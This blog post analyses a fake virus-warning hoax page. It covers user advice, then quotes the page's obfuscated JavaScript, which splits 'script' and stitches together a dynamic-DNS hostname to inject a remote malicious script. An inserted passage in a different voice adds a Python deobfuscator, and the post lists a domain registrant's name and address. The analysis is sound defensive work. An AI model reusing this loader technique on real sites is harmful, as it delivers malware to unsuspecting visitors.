John C. Kirk (johnckirk) wrote,

Fake virus warnings

Someone called me earlier, because she had a big virus warning on her screen. This was actually a hoax (a web page trying to install malware), so it's useful to know what to look for, so that you recognise it when it happens to you.

At the moment, you can duplicate this if you go to this page:
I've deliberately changed "http" to "hxxp", so that you don't click on it by accident. This is a malicious site, so only go there if you're sure that you can get away safely. I've observed the same behaviour in IE8 and Firefox 3.6.12 (on Windows 7), but I haven't tried any other OS/browser.

The main webpage disappears, and instead you get a message box:

Message from webpage

Note that this says "Message from webpage", i.e. this has come from the internet, not your local computer. (The equivalent Firefox message tells you which website has generated it.) At this point, you should get rid of the message without clicking "OK" or the red X. I tried Alt+F4 (in IE), but that still acted as if I'd clicked OK, so the only certain method is to run Task Manager, select this app, then click "End Task".

Anyway, if you do click "OK", you then see a window like this, which appears to be doing a virus scan:

Security Analysis

As a general tip, any program that claims to have scanned your entire hard drive in a couple of seconds is lying!

If you try to get rid of this window, it nags you to stick around:

Don't leave me!

If you click anywhere on the "Security Analysis" screen, it prompts you to download a file:


That's the whole purpose of the exercise - the people who set up the hoax want you to run this file, which will then do something nasty to your computer, e.g. joining their botnet. So, you don't want this file! If you get this far, use Task Manager to shut down the web browser completely.

In theory, you could download the program, scan it for viruses, then run it if it's safe. However, I used McAfee VirusScan Enterprise 8.7 (with all the latest security updates), and that told me that the file was clean. In fairness, I haven't actually run the program, so I am just assuming that it's bad. However, I trust my instincts more than I trust any anti-virus software.

So, if your computer suddenly tells you that you've got loads of viruses, don't panic. If you're not sure what to do, ask for advice. This certainly applies if you're at work: I think I speak for all IT staff when I say that we'd much rather help you out beforehand than clean up the mess afterwards.

The rest of this post is a bit more "forensic", since I've been trying to work out how this happened. This will be very technical, so don't bother reading if you're not an IT person :) If you are a techie, you may be able to help out where I've got stuck. As far as I can tell, here are the steps to reproduce the problem:

1. Go to Google.

2. Do an image search for "map of central america" (without the quotes).

3. The 12th image (at the time of writing) looks like this:
Central America
and it takes you to:
(Again, I've mangled the URL to avoid accidental clicking.)

I think that's it, so I can't fault anyone for being taken in. I don't see the fake virus warning on my PC, but based on the firewall logs and my examination of the page, that's all the other person did. Mind you, it's also odd that the virus warning apparently appeared 10 minutes later, so she thought that it was from a different site.

The bigbestmovie page has 4 maps at the top, which are all "stolen" (hotlinked) from other sites. In particular, the one that showed up in the Google image results is this one:
as used on this page:
Just to clarify, the "God's Geography" site looks completely safe, and they have nothing to do with the dodgy stuff going on elsewhere; they're just an innocent bystander.

Looking at the HTML source for the bigbestmovie page, it has 3 blocks of JavaScript at the start of the <body> section:

<script language='JavaScript' >
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;
// "script" is split in two so that a naive filter doesn't see a <script> tag in the source
var y1 = "<s"+"cript language='JavaScript' src='"+x1+"' ><"+"/"+"script>";
document.write(y1); // injects the generated <script> tag into the page
</script>
<script language='JavaScript' >
// the hostname is stitched together from 9 fragments: ucyganijo.dyndns-server.com
var b1="ucy";
var b2="gan";
var b3="ijo";
var b4=".dy";
var b5="ndn";
var b6="s-s";
var b7="erv";
var b8="er.";
var b9="com";
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
var y = "<s"+"cript language='JavaScript' src='"+x+"' ><"+"/"+"script>";
document.write(y); // same trick again, this time pointing at the external server
</script>
<script src="/nlc/in.cgi?14"></script>

The first 2 get replaced at runtime, so the block then looks like this:

<script language='JavaScript' src='/partner.js?frm=GOOGLE&default_keyword=DOCTITLE' ></script>
<script language='JavaScript' src='hxxp://' ></script>
<script src="/nlc/in.cgi?14"></script>

The bits in CAPITALS are just placeholders: GOOGLE is the URL of the Google results page, and DOCTITLE is the title of this (bigbestmovie) page. So, the first line would really look something like this:


The second JavaScript file is a bit odd, because the server name changed. The firewall logs referred to:
rather than:
hxxp:// is a legitimate site, which sells sub-domains in "" and "" (among others), so agosagyvux and ucyganijo are the equivalent of LiveJournal usernames. I assume that they both belong to the same person, although I'm not sure why he's using DynDNS at all. Maybe the dodgy code is being hopped around to different machines on a botnet? That being the case, it's curious that the page also got updated to refer to a different name, particularly in such a short space of time (less than 2 hours).
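As an added example (my own script, not anything from the post or from the site in question), here is how to reassemble the fragmented hostname from the second block above statically, i.e. without ever running the JavaScript, which is the safe way to work out what name to look for in the firewall logs:

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the second obfuscated <script> block from the
# bigbestmovie page as quoted in the post (only the whitespace differs).
SAMPLE_JS = '''
var b1="ucy"; var b2="gan"; var b3="ijo"; var b4=".dy"; var b5="ndn";
var b6="s-s"; var b7="erv"; var b8="er."; var b9="com";
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
var y = "<s"+"cript language='JavaScript' src='"+x+"' ><"+"/"+"script>";
'''

# 'var NAME = expr;' where ';' may appear inside a double-quoted literal.
ASSIGN_RE = re.compile(r'var\s+(\w+)\s*=\s*((?:"[^"]*"|[^;"])+);')
# Pieces of a '+' chain: a double-quoted literal, or an identifier such as
# b1, document.title or encodeURIComponent(document.referrer).
TOKEN_RE = re.compile(r'"([^"]*)"|([A-Za-z_]\w*(?:\.\w+)*(?:\([^)]*\))?)')

def evaluate(expr, env):
    """Fold a concatenation chain without executing it: known names are
    substituted, runtime-only values (DOM properties, calls) are kept as
    {placeholders} so the shape of the URL survives."""
    out = []
    for m in TOKEN_RE.finditer(expr):
        if m.group(1) is not None:
            out.append(m.group(1))
        else:
            out.append(env.get(m.group(2), "{" + m.group(2) + "}"))
    return "".join(out)

def resolve(js):
    """Evaluate every assignment in source order; returns name -> value."""
    env = {}
    for name, rhs in ASSIGN_RE.findall(js):
        env[name] = evaluate(rhs, env)
    return env

def assembled_urls(js):
    """For each variable holding an absolute URL: (name, hostname, url,
    number of other variables glued together to build it). A hostname
    stitched from many tiny literals is the tell-tale of this loader."""
    env = resolve(js)
    hits = []
    for name, rhs in ASSIGN_RE.findall(js):
        value = env[name]
        if value.startswith(("http://", "https://")):
            refs = [i for _, i in TOKEN_RE.findall(rhs) if i in env]
            hits.append((name, urlsplit(value).hostname, value, len(refs)))
    return hits
```

Calling assembled_urls(SAMPLE_JS) reports that x resolves to ucyganijo.dyndns-server.com and was built from 10 other variables; swapping in the first block gives the relative /partner.js address instead, so the same parser covers both.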

I've tried to download the partner.js files, but if I just request the files themselves (no parameters) then I get a 404 error. If I supply the full address from the firewall log, I can download something. However, the one from is a 0 byte file, and the one from the DynDNS site is only 2 bytes (appearing as whitespace in Notepad). This may mean that there's something sneaky going on, so you only get the real JavaScript file if there's a referring page, but I can't find any copies in my cache. Alternately, they may both be red herrings, with the real work being done in the CGI file, e.g. that might be generating new JavaScript on the fly. Any suggestions would be welcome.

If I go to:
then it redirects me to:
which just has a list of YouTube videos. This seems like an ostentatiously innocent site, i.e. it's deliberately intended to divert suspicion. I'm not sure what the uid is for; maybe this site is a front for lots of malware sites, and they want to keep track of their customers?

If I pass a parameter to the site, as above:
it then redirects me to a different site. Again, I've found that the addresses keep changing, which makes it hard to do any effective blocking. Initially, it went to:
I noticed that this URL is similar to the one above, i.e. they're both Indian sites containing numbers and punctuation. According to whois for India, they are indeed both registered to the same person:
Adam Allen, 87 Columbia Heights, New York 11013

On subsequent visits, the "new-protectionsoft23" page has also redirected me to:
I haven't bothered doing a search, but I'm guessing that these domains also belong to the same guy.

I've got that far, but now I'm stuck. Should I report this to someone? If so, whom? I don't know whether the site is directly involved in this, or whether they've been hacked. However, even in the best case scenario they look a bit dodgy, i.e. stealing content and throwing in phrases like "miss america" to attract search engines, and for practical purposes they're still dangerous to visitors. Google might be willing to block that site from their search results; the only snag is that I can't duplicate the problem on my machine, so they might not get it either. Again, any suggestions would be welcome.

Ah well, if nothing else it's been an interesting exercise.
Tags: computers, security
